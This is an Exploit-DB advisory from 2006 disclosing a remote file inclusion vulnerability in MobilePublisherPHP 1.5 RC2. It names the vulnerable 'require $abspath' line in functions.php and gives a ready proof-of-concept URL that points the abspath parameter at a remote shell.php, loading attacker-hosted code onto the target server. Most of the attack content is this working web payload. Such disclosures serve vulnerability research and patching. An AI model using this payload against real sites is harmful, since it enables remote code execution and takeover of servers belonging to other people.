MobilePublisherPHP 1.5 RC2 - Remote File Inclusion

EDB-ID:

2383


Author:

Timq

Type:

webapps


Platform:

PHP

Date:

2006-09-17


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org

Team-Rootshell
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org

Team-Rootshell
##################################################################

Vulnerable: require $abspath."/functions.php";

###################################################################

Exploit PoC:

http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?


####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender


#####################################################################

# milw0rm.com [2006-09-17]